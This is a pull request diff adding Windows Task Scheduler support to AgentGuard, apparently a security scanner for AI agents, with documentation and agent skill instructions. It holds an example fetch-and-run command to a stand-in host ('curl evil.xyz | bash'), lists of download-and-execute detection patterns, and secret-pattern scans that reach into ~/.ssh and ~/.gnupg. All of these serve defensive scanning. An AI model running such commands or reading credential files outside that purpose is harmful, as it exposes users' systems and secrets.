### PR TITLE
feat: add Windows Task Scheduler support

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -3,11 +3,13 @@
 ## Unreleased
 
 ### Added
+- Added native Windows Task Scheduler support for AgentGuard scheduled jobs.
 - Added native DSH threat-feed subscription management, advisory self-check discovery, and queued delivery of cron notifications to active DSH sessions.
 - Added HTTPS GitHub repository support to `agentguard scan`, including `--ref` selection for branches, tags, fully qualified refs, and full commit SHAs, with bounded non-interactive Git acquisition.
 - Added direct DSH profile plugin discovery and DSH-specific risk scanning to the standard `agentguard checkup` workflow.
 
 ### Fixed
+- Fixed Windows and system-cron patrols to run the existing eight-check `agentguard checkup --json` flow while keeping SessionStart lightweight.
 - Improved DSH subscription cleanup and artifact discovery, and made system cron status failures explicit.
 - Fixed `checkup` to recursively scan plugins referenced by DSH bundles, wait for all DSH scans before report generation, and include per-plugin results in JSON and HTML reports.
 

--- a/README.md
+++ b/README.md
@@ -90,7 +90,8 @@ agentguard subscribe --quiet
 # you to review newly published advisories. Auto uses the agent host saved by
 # `agentguard init`: OpenClaw uses native OpenClaw cron with Gateway
 # fallback at 127.0.0.1:18789, QClaw uses QClaw Gateway at 127.0.0.1:28789,
-# Hermes uses native Hermes cron, while Claude Code/Codex use system crontab.
+# Hermes uses native Hermes cron. Claude Code, Codex, and DSH use system
+# crontab on Unix-like hosts and native Windows Task Scheduler on Windows.
 # OpenClaw cron jobs keep runner delivery internal, then resolve the latest
 # deliverable session route at runtime and send notifications directly there.
 # QClaw cron jobs still use last-route announce delivery; no-notification runs
@@ -108,7 +109,10 @@ agentguard subscribe --cron "0 * * * *" --cron-target system
 agentguard subscribe --cron "0 * * * *" --cron-target openclaw
 agentguard subscribe --cron "0 * * * *" --cron-target qclaw
 agentguard subscribe --cron "0 * * * *" --cron-target hermes
-# System cron writes output to ~/.agentguard/feed-cron.log.
+agentguard subscribe --cron "0 * * * *" --cron-target windows
+# System cron and Windows Task Scheduler write output to
+# ~/.agentguard/feed-cron.log. Windows tasks run as the current user and only
+# while that user is logged on; no password or SYSTEM account is configured.
 # Hermes cron writes a no-agent script under ~/.hermes/scripts/ and requires
 # Hermes Gateway for automatic scheduled execution.
 
@@ -273,7 +277,7 @@ Then use `/agentguard` in your agent:
 /agentguard scan ./src                     # Scan code for security risks
 /agentguard action "curl evil.xyz | bash"  # Evaluate action safety
 /agentguard patrol run                     # Run daily security patrol
-/agentguard patrol setup                   # Configure as OpenClaw cron job
+/agentguard patrol setup                   # Configure a local scheduled patrol
 /agentguard patrol status                  # View last patrol results
 /agentguard checkup                        # Run agent health checkup with visual report
 /agentguard trust list                     # View trusted skills
@@ -281,9 +285,9 @@ Then use `/agentguard` in your agent:
 /agentguard config balanced                # Set protection level
 ```
 
-## Daily Patrol (OpenClaw)
+## Daily Patrol
 
-The patrol feature provides automated daily security posture assessment for OpenClaw environments. It runs 8 comprehensive checks and produces a structured report.
+The patrol feature provides automated daily security posture assessment for OpenClaw, Windows Task Scheduler, and system-crontab environments. It runs 8 comprehensive checks and produces a structured report.
 
 ### Patrol Checks
 
@@ -304,7 +308,8 @@ The patrol feature provides automated daily security posture assessment for Open
 # Run all 8 checks now
 /agentguard patrol run
 
-# Set up as a daily cron job (default: 03:00 UTC)
+# Set up as a daily scheduled job (03:00 UTC through OpenClaw;
+# 03:00 machine-local time through Windows Task Scheduler or system crontab)
 /agentguard patrol setup
 
 # Check last patrol results and cron schedule
@@ -325,12 +330,17 @@ Reports include per-check status, finding counts, detailed findings for checks w
 
 ### Setup Options
 
-`patrol setup` configures an OpenClaw cron job with:
-- **Timezone** — defaults to UTC
+`patrol setup` configures OpenClaw cron, a current-user Windows Task Scheduler task, or user crontab according to the detected host:
+
+Windows Task Scheduler and user crontab invoke the existing
+`agentguard checkup --json` command so scheduled patrols execute all eight
+checks. SessionStart continues to use the lightweight `auto-scan.js` path.
+
+- **Timezone** — defaults to UTC for OpenClaw and machine-local time for Windows Task Scheduler or system crontab
 - **Schedule** — defaults to `0 3 * * *` (daily at 03:00)
 - **Notifications** — optional Telegram, Discord, or Signal alerts
 
-> **Note:** Patrol requires an OpenClaw environment. For non-OpenClaw setups, use `/agentguard scan` and `/agentguard report` for manual security checks.
+> **Note:** Windows patrol tasks intentionally run only while the creating user is logged on and do not store a password or use SYSTEM privileges.
 
 ## Agent Health Checkup 🦞
 

--- a/docs/dsh.md
+++ b/docs/dsh.md
@@ -39,8 +39,9 @@ The three static AgentGuard DSH tools preserve the Phase 1 boundary: they do not
 
 The native `agentguard_dsh_subscribe` tool binds a threat-feed subscription to
 the exact DSH agent that invokes it. It subscribes the currently connected
-AgentGuard Cloud identity, installs a system crontab poller, and stores the
-binding in `~/.agentguard/dsh-threat-feed-subscription.json`.
+AgentGuard Cloud identity, installs a local scheduled poller, and stores the
+binding in `~/.agentguard/dsh-threat-feed-subscription.json`. The poller uses
+system crontab on Unix-like hosts and native Windows Task Scheduler on Windows.
 
 Before invoking the tool, initialize the DSH integration and connect Cloud:
 
@@ -61,9 +62,11 @@ The tool accepts these optional arguments:
 - `selfCheck`: defaults to `false`; set it to `true` only when scheduled local self-checks are intended;
 - `force`: replace a subscription bound to another DSH agent or schedule.
 
-Polling continues while DSH is stopped because the job is owned by system
-crontab. The cron runner must be able to find the `agentguard` executable on
-its saved `PATH`, and writes output to `~/.agentguard/feed-cron.log`.
+Polling continues while DSH is stopped because the job is owned by the local
+scheduler. On Windows, the task runs at least privilege as the current user and
+only while that user is logged on; AgentGuard does not store the user's password
+or register the task as SYSTEM. The runner writes output to
+`~/.agentguard/feed-cron.log`.
 
 When a pull finds new advisories, or a `selfCheck: true` pull finds local
 matches, the cron process first writes a bounded notice under
@@ -79,13 +82,13 @@ notice id after restart.
 Use `agentguard_dsh_subscription_status` with no arguments to inspect the
 subscription safely. It reports whether state is saved, the subscription and
 target agent ids, whether the caller is that target, the configured cron and
-self-check mode, whether the exact system cron block is installed, the queued
+self-check mode, the selected scheduler backend, whether the exact local scheduled task is installed, the queued
 notice count, and the latest enqueue time. It never returns notification
 bodies, matched local paths, credentials, or Cloud remediation text.
 
 Use `agentguard_dsh_unsubscribe` with no arguments from the exact subscribed
 DSH session to remove the subscription. Cleanup is ordered transactionally:
-the managed system cron is removed or confirmed absent first, then only queue
+the managed local scheduled task is removed or confirmed absent first, then only queue
 files for that subscription and agent are deleted, and subscription state is
 deleted last. A cron read/removal error or queue cleanup error leaves the saved
 state in place so the operation can be retried. Calling it when no subscription
@@ -130,12 +133,19 @@ grep -F '"@goplus/agentguard"' "$HOME/.dsh/profiles/web/package.json"
 The first command must resolve under the active Node/npm installation, not the
 checkout in a macOS protected user folder. Restart DSH after the plugin add.
 Invoke `agentguard_dsh_subscribe` from the DSH conversation, then trigger one
-poll without waiting for cron:
+poll without waiting for the scheduler. On Unix-like hosts:
 
 ```bash
 "$HOME/.agentguard/scripts/agentguard-threat-feed.sh"
 tail -n 50 "$HOME/.agentguard/feed-cron.log"
 find "$HOME/.agentguard/dsh-feed-notifications" -maxdepth 1 -type f -name '*.json' -print
+```
+
+On Windows, start the registered task and inspect its log instead:
+
+```bat
+schtasks.exe /Run /TN "AgentGuard-agentguard-threat-feed"
+powershell.exe -NoProfile -Command "Get-Content -Tail 50 $env:USERPROFILE\.agentguard\feed-cron.log"
 ```
 
 An immediate DSH follow-up requires an unseen advisory (or a new self-check

--- a/package-lock.json
+++ b/package-lock.json
@@ -13,6 +13,7 @@
         "@modelcontextprotocol/sdk": "1.29.0",
         "axios": "1.14.0",
         "commander": "12.1.0",
+        "croner": "10.0.1",
         "glob": "13.0.6",
         "open": "10.2.0",
         "yaml": "2.9.0",
@@ -678,6 +679,25 @@
       "funding": {
         "type": "opencollective",
         "url": "https://opencollective.com/express"
+      }
+    },
+    "node_modules/croner": {
+      "version": "10.0.1",
+      "resolved": "https://registry.npmjs.org/croner/-/croner-10.0.1.tgz",
+      "integrity": "sha512-ixNtAJndqh173VQ4KodSdJEI6nuioBWI0V1ITNKhZZsO0pEMoDxz539T4FTTbSZ/xIOSuDnzxLVRqBVSvPNE2g==",
+      "funding": [
+        {
+          "type": "other",
+          "url": "https://paypal.me/hexagonpp"
+        },
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/hexagon"
+        }
+      ],
+      "license": "MIT",
+      "engines": {
+        "node": ">=18.0"
       }
     },
     "node_modules/cross-spawn": {

--- a/package.json
+++ b/package.json
@@ -68,6 +68,7 @@
     "@modelcontextprotocol/sdk": "1.29.0",
     "axios": "1.14.0",
     "commander": "12.1.0",
+    "croner": "10.0.1",
     "glob": "13.0.6",
     "open": "10.2.0",
     "yaml": "2.9.0",

--- a/skills/agentguard/SKILL.md
+++ b/skills/agentguard/SKILL.md
@@ -10,10 +10,10 @@ metadata:
 filesystem-access:
   - path: "~/.ssh/"
     access: read-only
-    reason: "Credential safety audit — check directory permissions (stat only, no key content read)"
+    reason: "Credential safety patrol — check permissions and bounded security-relevant file contents for exposed secrets"
   - path: "~/.gnupg/"
     access: read-only
-    reason: "Credential safety audit — check directory permissions (stat only)"
+    reason: "Credential safety patrol — check permissions and bounded security-relevant file contents for exposed secrets"
   - path: "~/.claude/"
     access: read-only
     reason: "Discover installed skills and read security hook configuration"
@@ -30,7 +30,7 @@ filesystem-access:
     access: read-write
     reason: "Read/write audit log (audit.jsonl) and protection level config (config.json)"
 user-invocable: true
-allowed-tools: Read, Write, Grep, Glob, Bash(node *trust-cli.js *) Bash(node *action-cli.js *) Bash(*checkup-report.js) Bash(*checkup-score.js) Bash(*scan-to-sarif.js) Bash(echo *checkup-report.js) Bash(cat *checkup-report.js) Bash(agentguard *) Bash(openclaw *) Bash(ss *) Bash(lsof *) Bash(ufw *) Bash(iptables *) Bash(crontab *) Bash(systemctl list-timers *) Bash(find *) Bash(stat *) Bash(env) Bash(sha256sum *) Bash(node *) Bash(cd *)
+allowed-tools: Read, Write, Grep, Glob, Bash(node *trust-cli.js *) Bash(node *action-cli.js *) Bash(*checkup-report.js) Bash(*checkup-score.js) Bash(*scan-to-sarif.js) Bash(echo *checkup-report.js) Bash(cat *checkup-report.js) Bash(agentguard *) Bash(command -v agentguard) Bash(command -v node) Bash(openclaw *) Bash(schtasks *) Bash(schtasks.exe *) Bash(where *) Bash(ss *) Bash(lsof *) Bash(ufw *) Bash(iptables *) Bash(crontab *) Bash(systemctl list-timers *) Bash(find *) Bash(stat *) Bash(env) Bash(sha256sum *) Bash(node *) Bash(cd *)
 argument-hint: "[scan|action|patrol|subscribe|trust|report|config|checkup|cli] [args...] [--format sarif|json] [--output <file>]"
 ---
 
@@ -74,7 +74,7 @@ Parse `$ARGUMENTS` to determine the subcommand:
 - **`connect [args...]`** — Run `agentguard connect` to connect optional Cloud policy, audit, and approvals. AgentGuard supports either API-key auth or Agent JWT auth; only one Cloud auth method is required.
 - **`scan <path>`** — Scan a skill or codebase for security risks
 - **`action <description>`** — Evaluate whether a runtime action is safe
-- **`patrol [run|setup|status]`** — Daily security patrol for OpenClaw environments
+- **`patrol [run|setup|status]`** — Daily security patrol for supported agent and local-scheduler environments
 - **`trust <lookup|attest|revoke|list|seed> [args]`** — Manage skill trust levels
 - **`subscribe [args...]`** — Pull AgentGuard Cloud threat-feed advisories, self-check local skills, and optionally install the OpenClaw 15-minute conditional notification cron
 - **`report`** — View recent security events from the audit log
@@ -89,7 +89,7 @@ If no subcommand is given, or the first argument is a path, default to **scan**.
 
 This skill is allowed to run `agentguard *`, so CLI commands and flags are available even when the skill has a higher-level workflow for the same area.
 
-The skill's routed subcommands take priority over similarly named CLI commands. Do not route these through the packaged CLI unless the user explicitly prefixes the request with `/agentguard cli`: `scan`, `action`, `patrol`, `trust`, `report`, `config`, `checkup`, `hermes-hooks`.
+The skill's routed subcommands take priority over similarly named CLI commands. Do not route these through the packaged CLI unless the user explicitly prefixes the request with `/agentguard cli`: `scan`, `action`, `patrol`, `trust`, `report`, `config`, `checkup`, `hermes-hooks`. The sole internal exception is the patrol workflow's canonical collector: `patrol run` and locally scheduled patrols execute the existing `agentguard checkup --json` command as specified below.
 
 Use CLI passthrough for the CLI-only commands below, for `init` and `connect`, for explicit `/agentguard cli <args...>` requests, or for the targeted `checkup --against-advisory <id>` mode described below.
 
@@ -107,7 +107,7 @@ Supported CLI commands and options:
 | `agentguard approvals list` | `--json` | Lists unexpired pending runtime approvals |
 | `agentguard doctor` | none | Checks local setup and Cloud reachability when connected |
 | `agentguard protect` | `--agent <agent>`, `--action-type <type>`, `--tool-name <name>`, `--session-id <id>`, `--decision-mode <local-first|cloud>`, `--json` | Evaluates one runtime action from stdin or hook environment |
-| `agentguard subscribe` | `--since <iso>`, `--json`, `--quiet`, `--no-report`, `--cron <expr>`, `--cron-target <auto|openclaw|qclaw|hermes|system>`, `--cron-name <name>`, `--force`, `--cron-run`, `--cron-notify-run` | Pulls Cloud threat advisories and optionally self-checks local skills |
+| `agentguard subscribe` | `--since <iso>`, `--json`, `--quiet`, `--no-report`, `--cron <expr>`, `--cron-target <auto|openclaw|qclaw|hermes|system|windows>`, `--cron-name <name>`, `--force`, `--cron-run`, `--cron-notify-run` | Pulls Cloud threat advisories and optionally self-checks local skills |
 | `agentguard checkup` | `--json` | Runs the local agent health checkup |
 | `agentguard checkup --against-advisory <id>` | `--json` | CLI threat-feed self-check for one advisory; this is a targeted mode, not the default health-check workflow |
 
@@ -121,7 +121,7 @@ If the user writes `/agentguard cli <args...>`, execute `agentguard <args...>` d
 
 When AgentGuard returns `confirm` or a block reason that includes `Approve once ... agentguard approve --action-id ... --once`, do not retry the protected action until the user explicitly approves. Show the exact approval command to the user before running it. Never run an approval command proactively, and never infer approval from context or from the agent's own plan. Treat user replies such as "yes", "approve", "approved", "confirm", "confirmed", "continue", "go ahead", "execute", "run it", "同意", "确认", "批准", "继续", or "执行" as explicit approval for the most recent protected action only after the user has seen the command and understands which action is being approved. After approval, run exactly the provided `agentguard approve --action-id ... --once` command, then retry the original action once. If the action id is unavailable, use `agentguard approvals list --json`; only use `agentguard approve --last --once` when there is exactly one relevant unexpired pending approval. If multiple pending approvals exist, ask the user to choose a specific action id.
 
-Do **not** route plain `/agentguard scan`, `/agentguard action`, `/agentguard patrol`, `/agentguard trust`, `/agentguard report`, `/agentguard config`, `/agentguard checkup`, `/agentguard checkup --json`, or natural-language requests like "run agentguard checkup" through the packaged CLI. Those are this skill's higher-level workflows. Only use the packaged CLI checkup path when the user includes `--against-advisory <id>` or explicitly writes `/agentguard cli checkup ...`.
+Do **not** route plain `/agentguard scan`, `/agentguard action`, `/agentguard patrol`, `/agentguard trust`, `/agentguard report`, `/agentguard config`, `/agentguard checkup`, `/agentguard checkup --json`, or natural-language requests like "run agentguard checkup" through the packaged CLI. Those are this skill's higher-level workflows. The patrol workflow may internally execute `agentguard checkup --json` as its canonical 8-check collector. Outside that internal patrol step, only use the packaged CLI checkup path when the user includes `--against-advisory <id>` or explicitly writes `/agentguard cli checkup ...`.
 
 If the user writes `/agentguard checkup --against-advisory <id>`, use the CLI command `agentguard checkup --against-advisory <id>` instead of the comprehensive HTML health-report workflow.
 
@@ -229,6 +229,7 @@ agentguard subscribe --cron "0 * * * *" --cron-target system
 agentguard subscribe --cron "0 * * * *" --cron-target openclaw
 agentguard subscribe --cron "0 * * * *" --cron-target qclaw
 agentguard subscribe --cron "0 * * * *" --cron-target hermes
+agentguard subscribe --cron "0 * * * *" --cron-target windows
 agentguard subscribe --cron "0 * * * *" --quiet
 agentguard subscribe --cron "0 * * * *" --cron-name agentguard-threat-feed
 agentguard subscribe --cron "0 * * * *" --force
@@ -236,9 +237,9 @@ agentguard subscribe --cron "0 * * * *" --force
 
 Without `--quiet`, `agentguard subscribe` pulls new threat-feed advisories and notifies the user to review them manually. With `--quiet`, it runs the full automated flow: pull new advisories, self-check local skills, report local matches back to Cloud, and notify only when local matches are found.
 
-When `--cron <expr>` is used, the CLI first runs the subscribe flow once, then installs a recurring job using a standard five-field crontab expression such as `"0 * * * *"`. `--cron-target auto` is the default and uses the agent host saved by `agentguard init --agent`: `openclaw` uses the native `openclaw cron add` command and falls back to the OpenClaw Gateway at `127.0.0.1:18789`, `qclaw` uses the QClaw Gateway at `127.0.0.1:28789`, `hermes` uses native `hermes cron create` with a no-agent script under `~/.hermes/scripts/`, while `claude-code` and `codex` install a user crontab entry. OpenClaw cron jobs keep runner delivery internal and run internal `--cron-run`; when the saved agent host is `openclaw`, that run resolves the latest deliverable session route at runtime and sends the notification there directly. QClaw cron jobs still use host `announce` delivery to the last chat route and run internal `--cron-notify-run`, which prints either the exact notification body or `NO_REPLY`; this keeps no-op cron ticks silent without embedding chat IDs in the job. If no agent host is saved, auto asks the user to run `agentguard init --agent <claude-code|codex|openclaw|hermes|qclaw>` first or pass `--cron-target openclaw`, `--cron-target qclaw`, `--cron-target hermes`, or `--cron-target system` explicitly. If a saved host exists and you pass `--cron-target openclaw`, it must already be `openclaw`; otherwise the CLI rejects the mismatch instead of installing a cron job that cannot notify correctly. Pass `--cron-name <name>` to choose the job name. If a job with the same name already exists, the CLI leaves it untouched unless `--force` is passed.
+When `--cron <expr>` is used, the CLI first runs the subscribe flow once, then installs a recurring job using a standard five-field cron expression such as `"0 * * * *"`. `--cron-target auto` is the default and uses the agent host saved by `agentguard init --agent`: `openclaw` uses the native `openclaw cron add` command and falls back to the OpenClaw Gateway at `127.0.0.1:18789`, `qclaw` uses the QClaw Gateway at `127.0.0.1:28789`, `hermes` uses native `hermes cron create` with a no-agent script under `~/.hermes/scripts/`, while `claude-code`, `codex`, and `dsh` use user crontab on Unix-like hosts and the native Windows Task Scheduler on Windows. The Windows task runs only while the creating user is logged on, at least privilege, and invokes a lightweight runner every minute to preserve the full five-field expression and configured timezone. OpenClaw cron jobs keep runner delivery internal and run internal `--cron-run`; when the saved agent host is `openclaw`, that run resolves the latest deliverable session route at runtime and sends the notification there directly. QClaw cron jobs still use host `announce` delivery to the last chat route and run internal `--cron-notify-run`, which prints either the exact notification body or `NO_REPLY`; this keeps no-op cron ticks silent without embedding chat IDs in the job. If no agent host is saved, auto asks the user to run `agentguard init --agent <claude-code|codex|openclaw|hermes|qclaw|dsh>` first or pass a target explicitly. `--cron-target windows` forces Task Scheduler and `--cron-target system` forces crontab. If a saved host exists and you pass `--cron-target openclaw`, it must already be `openclaw`; otherwise the CLI rejects the mismatch instead of installing a cron job that cannot notify correctly. Pass `--cron-name <name>` to choose the job name. If a job with the same name already exists, the CLI leaves it untouched unless `--force` is passed.
 
-System cron writes output to `~/.agentguard/feed-cron.log`; it does not send OpenClaw agent-channel notifications.
+System cron and Windows Task Scheduler write output to `~/.agentguard/feed-cron.log`; they do not send OpenClaw agent-channel notifications.
 
 `agentguard subscribe --json` always includes a stable `cron` object with `requested`, `installed`, and optional `result` fields. If cron installation fails, the command exits non-zero instead of printing a misleading success summary.
 
@@ -521,14 +522,14 @@ Always combine script results with the policy-based checks (webhook domains, sec
 
 ## Subcommand: patrol
 
-**Daily security patrol.** Runs 8 automated checks that leverage AgentGuard's scan engine, trust registry, and audit log to assess the security posture of your agent deployment. Works on OpenClaw and standard cron environments.
+**Daily security patrol.** Runs 8 automated checks that leverage AgentGuard's scan engine, trust registry, and audit log to assess the security posture of your agent deployment. Works on OpenClaw, Windows Task Scheduler, and standard cron environments.
 
 For detailed check definitions, commands, and thresholds, see [patrol-checks.md](patrol-checks.md).
 
 ### Sub-subcommands
 
 - **`patrol`** or **`patrol run`** — Execute all 8 checks and output a patrol report
-- **`patrol setup`** — Configure as a daily cron job (OpenClaw or system crontab)
+- **`patrol setup`** — Configure as a daily scheduled job (OpenClaw, Windows Task Scheduler, or system crontab)
 - **`patrol status`** — Show last patrol results and cron schedule
 
 ### Platform Detection
@@ -536,12 +537,23 @@ For detailed check definitions, commands, and thresholds, see [patrol-checks.md]
 Before running `patrol setup` or `patrol status`, detect the available scheduling platform:
 
 1. **OpenClaw**: Check for `$OPENCLAW_STATE_DIR` env var (fall back to `~/.openclaw/`), verify the directory exists and contains `openclaw.json`, and check if `openclaw` CLI is in PATH. If all three pass → use OpenClaw path.
-2. **System crontab**: Check if `crontab` command is available in PATH → use crontab path.
-3. **Neither available**: Inform the user and output the manual cron entry for them to add themselves.
+2. **Windows Task Scheduler**: Run `node -p "process.platform"`. If it prints `win32`, verify `schtasks.exe` with `where schtasks.exe` → use the Windows path even if a Unix-like shell also exposes `crontab`.
+3. **System crontab**: On non-Windows hosts, check if `crontab` is available in PATH → use the crontab path.
+4. **No scheduler available**: Inform the user and provide the appropriate manual setup guidance.
 
 For `patrol run`, no scheduling platform is needed — run checks on any platform.
 
-Set `$OC` to the resolved OpenClaw state directory for all subsequent checks.
+Run `agentguard checkup --json`. This existing non-interactive command is the
+canonical data collector for all 8 patrol checks; do not independently repeat
+the commands in the check definitions below. Group findings whose text starts
+with `[Patrol N]` into the corresponding report rows. Do not substitute
+`scripts/auto-scan.js`: that script is only the fast SessionStart scan and does
+not produce a completed patrol.
+
+The definitions below describe the required CLI collector coverage. Agent roots
+include the detected Claude Code, Codex, OpenClaw, QClaw, Hermes, and DSH
+installation/profile directories; OpenClaw-specific files are checked only when
+an OpenClaw root exists.
 
 ### The 8 Patrol Checks
 
@@ -550,7 +562,7 @@ Set `$OC` to the resolved OpenClaw state directory for all subsequent checks.
 Detect tampered or unregistered skill packages by comparing file hashes against the trust registry.
 
 **Steps**:
-1. Discover skill directories under `$OC/skills/` (look for dirs containing `SKILL.md`)
+1. Discover skill directories under all detected agent roots (look for dirs containing `SKILL.md`)
 2. For each skill, compute hash: `node scripts/trust-cli.js hash --path <skill_dir>`
 3. Look up the attested hash: `node scripts/trust-cli.js lookup --source <skill_dir>`
 4. If hash differs from attested → **INTEGRITY_DRIFT** (HIGH)
@@ -562,12 +574,12 @@ Detect tampered or unregistered skill packages by comparing file hashes against 
 Scan workspace files for leaked secrets using AgentGuard's own detection patterns.
 
 **Steps**:
-1. Use Grep to scan `$OC/workspace/` **recursively, covering all agent subdirectories** (e.g. all `workspace-agent-*/` directories, not just the current agent's workspace) with patterns from:
+1. Scan detected agent workspaces **recursively, covering all agent subdirectories** (e.g. all `workspace-agent-*/` directories, not just the current agent's workspace) with patterns from:
    - scan-rules.md Rule 7 (PRIVATE_KEY_PATTERN): `0x[a-fA-F0-9]{64}` in quotes
    - scan-rules.md Rule 8 (MNEMONIC_PATTERN): BIP-39 word sequences, `seed_phrase`, `mnemonic`
    - scan-rules.md Rule 5 (READ_SSH_KEYS): SSH key file references in workspace
    - action-policies.md secret patterns: AWS keys (`AKIA...`), GitHub tokens (`gh[pousr]_...`), DB connection strings
-2. Scan any `.env*` files under `$OC/` for plaintext credentials
+2. Scan any `.env*` files under detected agent roots for plaintext credentials
 3. Check `~/.ssh/` and `~/.gnupg/` directory permissions (should be 700)
 
 #### [3] Network Exposure
@@ -586,23 +598,23 @@ Audit all cron jobs for download-and-execute patterns.
 
 **Steps**:
 1. List OpenClaw cron jobs: `openclaw cron list`
-2. List system crontab: `crontab -l` and contents of `/etc/cron.d/`
-3. List systemd timers: `systemctl list-timers --all`
-4. Scan all cron command bodies using scan-rules.md Rule 2 (AUTO_UPDATE) patterns: `curl|bash`, `wget|sh`, `eval "$(curl`, `base64 -d | bash`
-5. Flag unknown cron jobs that touch `$OC/` directories
+2. On Windows, list scheduled tasks with `schtasks.exe /Query /FO CSV /V`. For AgentGuard tasks and any suspicious task, also run `schtasks.exe /Query /TN "<task-name>" /XML` and inspect `UserId`, `LogonType`, `RunLevel`, `Command`, and `Arguments`; verbose CSV alone is not sufficient to determine privilege level reliably.
+3. On Unix-like hosts, list system crontab with `crontab -l`, contents of `/etc/cron.d/`, and `systemctl list-timers --all`
+4. Scan all scheduled command bodies using scan-rules.md Rule 2 (AUTO_UPDATE) patterns: `curl|bash`, `wget|sh`, `eval "$(curl`, `base64 -d | bash`
+5. Flag unknown scheduled jobs that touch detected agent roots
 
 #### [5] File System Changes (24h)
 
 Detect suspicious file modifications in the last 24 hours.
 
 **Steps**:
-1. Find recently modified files: use Glob with patterns `$OC/**/*`, `~/.ssh/**/*`, `~/.gnupg/**/*` and filter results by mtime within 24h using `stat -f '%m %N' <file>` (macOS) or `stat -c '%Y %n' <file>` (Linux) — do NOT use the `find` binary as it may be unavailable in hardened environments
+1. Find recently modified files under detected agent roots, `~/.ssh/`, and `~/.gnupg/`, then filter by mtime within 24h
 2. For modified files with scannable extensions (.js/.ts/.py/.sh/.md/.json), run the full scan rule set
 3. Check permissions on critical files:
-   - `$OC/openclaw.json` → should be 600
-   - `$OC/devices/paired.json` → should be 600
+   - `<openclaw-root>/openclaw.json` → should be 600
+   - `<openclaw-root>/devices/paired.json` → should be 600
    - `~/.ssh/authorized_keys` → should be 600
-4. Detect new executable files in workspace: use Glob `$OC/workspace/**/*` and check each file's executable bit with `stat` — do NOT use `find` with `-perm`
+4. Detect new executable files in detected workspaces and check each file's executable bit with `stat`
 
 #### [6] Audit Log Analysis (24h)
 
@@ -626,7 +638,7 @@ Verify security configuration is production-appropriate.
 1. List environment variables matching sensitive names (values masked): `API_KEY`, `SECRET`, `PASSWORD`, `TOKEN`, `PRIVATE`, `CREDENTIAL`
 2. Check if `GOPLUS_API_KEY`/`GOPLUS_API_SECRET` are configured (if Web3 features are in use)
 3. Read `~/.agentguard/config.json` — flag `permissive` protection level in production
-4. If `$OC/.config-baseline.sha256` exists, verify: `sha256sum -c $OC/.config-baseline.sha256`
+4. If `<openclaw-root>/.config-baseline.sha256` exists, verify it with `sha256sum -c`
 
 #### [8] Trust Registry Health
 
@@ -647,7 +659,7 @@ Check for expired, stale, or over-privileged trust records.
 ## GoPlus AgentGuard Patrol Report
 
 **Timestamp**: <ISO datetime>
-**OpenClaw Home**: <$OC path>
+**Agent Roots**: <detected agent roots>
 **Protection Level**: <current level>
 **Overall Status**: PASS | WARN | FAIL
 
@@ -679,21 +691,22 @@ Check for expired, stale, or over-privileged trust records.
 
 **Overall status**: Any CRITICAL → **FAIL**, any HIGH → **WARN**, else **PASS**
 
-After outputting the report, append a summary entry to `~/.agentguard/audit.jsonl`:
+The `checkup` command appends the completed patrol summary to
+`~/.agentguard/audit.jsonl` using its existing checkup event:
 ```json
-{"timestamp":"...","event":"patrol","overall_status":"PASS|WARN|FAIL","checks":8,"findings":<count>,"critical":<count>,"high":<count>}
+{"timestamp":"...","event":"checkup","composite_score":<n>,"tier":"<grade>","checks":8,"findings":<count>,"skills_scanned":<count>,"dsh_plugins_scanned":<count>}
 ```
 
 ### patrol setup
 
-Configure the patrol as a daily cron job. Detects the available platform and uses the appropriate method.
+Configure the patrol as a daily scheduled job. Detects the available platform and uses the appropriate method.
 
 **Steps**:
 
 1. Run platform detection (see above).
 2. Ask the user for:
    - **Schedule** (default: `0 3 * * *` — daily at 03:00)
-   - **Timezone** (default: UTC). Examples: `Asia/Shanghai`, `America/New_York`, `Europe/London`
+   - **Timezone** (default: UTC for OpenClaw; the machine's local timezone for Windows Task Scheduler and system crontab). Examples: `Asia/Shanghai`, `America/New_York`, `Europe/London`. Windows Task Scheduler and portable system-crontab entries use local wall-clock time. If the user requests a different timezone for either local scheduler, explain that the generated daily trigger cannot preserve that timezone across daylight-saving changes and ask for a local `HH:mm` time instead.
    - **Notification channel** (optional, OpenClaw only): `telegram`, `discord`, `signal`
    - **Chat ID / webhook** (required if channel is set)
 
@@ -722,36 +735,67 @@ After execution, verify with `openclaw cron list`.
 
 > **Note**: `--timeout-seconds 300` is required because isolated sessions need cold-start time.
 
-#### Path B — System crontab available (OpenClaw not available)
+#### Path B — Windows Task Scheduler available (OpenClaw not available)
 
-Resolve the absolute path to this skill's directory (parent of this SKILL.md file) as `<SKILL_DIR>`.
+Windows patrol setup supports the daily patrol form `<minute> <hour> * * *`. For a different five-field expression, explain that this patrol workflow cannot map it losslessly and recommend the daily form; never silently change the requested schedule.
+
+Resolve and validate:
+- `<AGENTGUARD_CLI>`: run `where agentguard`, inspect each returned line, and select one existing absolute `.cmd` or `.exe` file (prefer `.cmd` for an npm installation). Do not select the extensionless POSIX shim. Reject quotes, `%`, null bytes, or newlines in the selected path. If no safe candidate exists, stop instead of guessing.
+- `<WRAPPER>`: `%USERPROFILE%\.agentguard\scripts\agentguard-patrol.cmd`.
+- `<LOCAL_TIME>`: `HH:mm` in the Windows machine's local timezone. Do not guess a conversion from a different requested timezone.
+
+Show the exact wrapper content and registration command, and wait for explicit user confirmation before writing or registering anything:
+
+```bat
+@echo off
+setlocal
+call "<AGENTGUARD_CLI>" checkup --json >> "%USERPROFILE%\.agentguard\patrol.log" 2>&1
+```
+
+```bat
+schtasks.exe /Create /TN "AgentGuard-agentguard-patrol" /SC DAILY /ST "<LOCAL_TIME>" /TR "\"<WRAPPER>\"" /IT /F
+```
+
+After confirmation, ensure `%USERPROFILE%\.agentguard\scripts` exists, use `Write` to create the wrapper, then execute the shown `schtasks.exe` command. `/IT` intentionally makes this a current-user, logged-on-only task; do not add stored credentials, `/RP`, `/RU SYSTEM`, or highest-privilege execution. Verify with:
+
+```bat
+schtasks.exe /Query /TN "AgentGuard-agentguard-patrol" /FO LIST /V
+```
+
+#### Path C — System crontab available (OpenClaw and Windows Task Scheduler not available)
+
+Resolve the absolute paths returned by `command -v node` and
+`command -v agentguard` as `<NODE_EXE>` and `<AGENTGUARD_CLI>`. The explicit
+Node path is required because cron commonly has a reduced `PATH` and an
+AgentGuard installation managed by NVM otherwise may not start.
 
 Validate before generating the entry:
-- `<schedule>` must be a standard five-field cron expression. Reject values that contain newlines.
-- `<SKILL_DIR>` must be an absolute path. Reject paths containing single quotes, double quotes, null bytes, or newlines.
